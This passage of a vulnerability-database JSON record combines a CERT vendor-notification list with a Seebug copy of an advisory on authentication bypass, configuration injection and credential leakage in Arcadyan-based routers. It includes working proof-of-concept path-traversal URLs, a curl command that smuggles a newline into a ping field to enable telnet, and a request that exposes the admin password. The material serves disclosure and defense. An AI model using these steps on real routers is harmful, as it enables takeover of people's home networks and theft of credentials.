Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### IBM Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Linksys Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### MikroTik Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Mitel Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Motorola Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NETGEAR Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### NetComm Wireless Limited Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Nokia Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10\n\n**Statement Date: August 10, 2021**\n\n**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quagga Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Quantenna Communications Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 
**CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ruckus Wireless Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### SMC Networks Inc. Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TDS Telecom Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### TP-LINK Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Technicolor Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Telus Unknown\n\nNotified: 2021-07-08 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Ubiquiti Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Verizon Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### Vodafone Group Inc. 
Unknown\n\nNotified: 2021-07-06 Updated: 2021-07-20 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### eero Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\n### pfSense Unknown\n\nNotified: 2021-08-10 Updated: 2021-08-10 **CVE-2021-20090**| Unknown \n---|--- \n \n#### Vendor Statement\n\nWe have not received a statement from the vendor.\n\nView all 61 vendors __View less vendors __\n\n \n\n\n### References\n\n * <https://www.tenable.com/security/research/tra-2021-13>\n * <https://vulners.com/cve/CVE-2021-20090>\n * <https://www.buffalo.jp/news/detail/20210427-03.html>\n * <https://medium.com/tenable-techblog/bypassing-authentication-on-arcadyan-routers-with-cve-2021-20090-and-rooting-some-buffalo-ea1dd30980c2>\n\n### Other Information\n\n**CVE IDs:** | [CVE-2021-20090 ](<http://web.nvd.nist.gov/vuln/detail/CVE-2021-20090>) \n---|--- \n**Date Public:** | 2021-07-20 \n**Date First Published:** | 2021-07-20 \n**Date Last Updated: ** | 2021-10-07 20:26 UTC \n**Document Revision: ** | 15 \n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-07-20T00:00:00", "type": "cert", "title": "Arcadyan-based routers and modems vulnerable to authentication bypass", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": 
"PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-10-07T20:26:00", "id": "VU:914124", "href": "https://www.kb.cert.org/vuls/id/914124", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "seebug": [{"lastseen": "2021-08-11T13:47:42", "description": "Tenable has discovered multiple vulnerabilities in routers manufactured by Arcadyan.\n\nDuring the disclosure process for the issues discovered in the Buffalo routers, Tenable discovered that CVE-2021-20090 affected many more devices, as the root cause of the vulnerability exists in the underlying Arcadyan firmware. \n\nPlease note that CVE-2021-20091 and CVE-2021-20092 have only been confirmed on Buffalo WSR-2533 models.\n\nCVE-2021-20090 : Path Traversal\nCVSSv3 Base Score: 8.1\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\nA path traversal vulnerability in the web interfaces of networking devices manufactured by Arcadyan, including Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24, could allow unauthenticated remote attackers to bypass authentication.\nThis vulnerability has also been confirmed to affect the following devices\nnote: the firmware versions listed do not indicate the latest affected firmware versions, only the firmware versions on which the issue was confirmed.\nPlease contact the devices' respective vendors for more information.\n\n| Vendor | Device | Found on version |\n| :-----| ----: | :----: |\n| ADB | ADSL wireless IAD router | 1.26S-R-3P |\n| Arcadyan | ARV7519 | 00.96.00.96.617ES |\n| Arcadyan | VRV9517 | 6.00.17 build04 |\n| Arcadyan | VGV7519 | 3.01.116 |\n| Arcadyan | VRV9518 | 1.01.00 build44 |\n| ASMAX | BBR-4MG / 
SMC7908 ADSL | 0.08 |\n| ASUS | DSL-AC88U (Arc VRV9517) | 1.10.05 build502 |\n| ASUS | DSL-AC87VG (Arc VRV9510) | 1.05.18 build305 |\n| ASUS | DSL-AC3100 | 1.10.05 build503 |\n| ASUS | DSL-AC68VG | 5.00.08 build272 |\n| Beeline | Smart Box Flash | 1.00.13_beta4 |\n| British Telecom | WE410443-SA | 1.02.12 build02 |\n| Buffalo | WSR-2533DHPL2 | 1.02 |\n| Buffalo | WSR-2533DHP3 | 1.24 |\n| Buffalo | BBR-4HG | |\n| Buffalo | BBR-4MG | 2.08 Release 0002 |\n| Buffalo | WSR-3200AX4S | 1.1 |\n| Buffalo | WSR-1166DHP2 | 1.15 |\n| Buffalo | WXR-5700AX7S | 1.11 |\n| Deutsche Telekom | Speedport Smart 3 | 010137.4.8.001.0 |\n| HughesNet | HT2000W | 0.10.10 |\n| KPN | ExperiaBox V10A (Arcadyan VRV9517) | 5.00.48 build453 |\n| KPN | VGV7519 | 3.01.116 |\n| O2 | HomeBox 6441 | 1.01.36 |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Orange | LiveBox Fibra (PRV3399) | 00.96.00.96.617ES |\n| Skinny | Smart Modem (Arcadyan VRV9517) | 6.00.16 build01 |\n| SparkNZ | Smart Modem (Arcadyan VRV9517) | 6.00.17 build04 |\n| Telecom (Argentina) | Arcadyan VRV9518VAC23-A-OS-AM | 1.01.00 build44 |\n| TelMex | PRV33AC | 1.31.005.0012 |\n| TelMex | VRV7006 | |\n| Telstra | Smart Modem Gen 2 (LH1000) | 0.13.01r |\n| Telus | WiFi Hub (PRV65B444A-S-TS) | v3.00.20 |\n| Telus | NH20A | 1.00.10debug build06 |\n| Verizon | Fios G3100 | 2.0.0.6 |\n| Vodafone | EasyBox 904 | 4.16 |\n| Vodafone | EasyBox 903 | 30.05.714 |\n| Vodafone | EasyBox 802 | 20.02.226 |\n\nProof of Concept:\n\nThe vulnerability exists due to a list of folders which fall under a \"bypass list\" for authentication. For most of the devices listed, that means that the vulnerability can be triggered by multiple paths. 
The simplest examples would be:\n\nFor a device in which http://<ip>/index.htm requires authentication, an attacker could access index.htm using the following paths:\n\nhttp://<ip>/images/..%2findex.htm\nhttp://<ip>/js/..%2findex.htm\nhttp://<ip>/css/..%2findex.htm\nTo have the pages load properly, one will need to use proxy match/replace settings to ensure any resources loaded which require authentication also leverage the path traversal. Additionally, certain files (those found under /cgi/) require a csrf (named httoken on these devices) token and a valid Referer header which will cause an error if the referer includes the ..%2f traversal (which can be match/replaced as well). \n\nCVE-2021-20091 : Configuration File Injection\nCVSSv3 Base Score: 7.5\nCVSSv3 Vector: AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly sanitize user input. An authenticated remote attacker could leverage this vulnerability to alter device configuration, potentially gaining remote code execution.\nProof of Concept:\nThe injection occurs in parameters which pass from apply_abstract.cgi to the device's global config file. Assuming the user is logged in (or, alternatively, the url can be changed to /images/..%2fapply_abstract.cgi, leveraging the path traversal), the following command could be used to inject a line into the configuration file which enables telnetd. \n\n```\ncurl --include -X POST http://<ip>/apply_abstract.cgi -H \"Referer: http://<ip>/ping.html\" --data \"action=start_ping&httoken=<valid httoken>&submit_button=ping.html&action_params=blink_time%3D5&ARC_ping_ipaddress=<ip>%0AARC_SYS_TelnetdEnable=1&ARC_ping_status=0&TMP_Ping_Type=4\"\n```\n\nThe %0A will be interpreted as a newline when the ping address is added to /tmp/etc/config/.glbcfg. 
When rebooted, a shell will be available on port 23.\nCVE-2021-20092 : Improper Access Control\nCVSSv3 Base Score: 5.9\nCVSSv3 Vector: AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N\nThe web interfaces of Buffalo WSR-2533DHPL2 firmware version <= 1.02 and WSR-2533DHP3 firmware version <= 1.24 do not properly restrict access to sensitive information from an unauthorized actor.\nProof of Concept:\n\nTo get a valid httoken, navigate to http://<ip of device>/loginerror.html in a modern browser (tested on chrome).\nOpen DevTools\nRun getToken() in the Console.\nCopy the token, and use it in the following command from a terminal:\n\n```\n$ curl --include \"http://192.168.11.1/cgi/cgi_i_filter.js?_tn=442853667\" -H \"Referer: http://192.168.11.1/loginerror.html\"\n\nHTTP/1.1 200 OK\nDate: Mon, 13 Jan 2020 15:24:03 GMT\nServer: Arcadyan httpd 1.0\nContent-type: application/x-javascript\nX-FRAME-OPTIONS: SAMEORIGIN\nConnection: close\n\n/*DEMO*/\nvar login_password = \u201c<admin password>\u201c;\n\naddCfg(\"lan_ipaddr\", 0, \"192.168.11.1\");\n```\n\nSolution\nCustomers should seek update and mitigation information from their respective vendors.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-08-11T00:00:00", "type": "seebug", "title": "Buffalo\u548cArcadyan\u591a\u6b3e\u8def\u7531\u5668\u8ba4\u8bc1\u7ed5\u8fc7RCE\u7b49\u591a\u4e2a\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", 
"availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-20090", "CVE-2021-20091", "CVE-2021-20092"], "modified": "2021-08-11T00:00:00", "id": "SSV:99329", "href": "https://www.seebug.org/vuldb/ssvid-99329", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}]}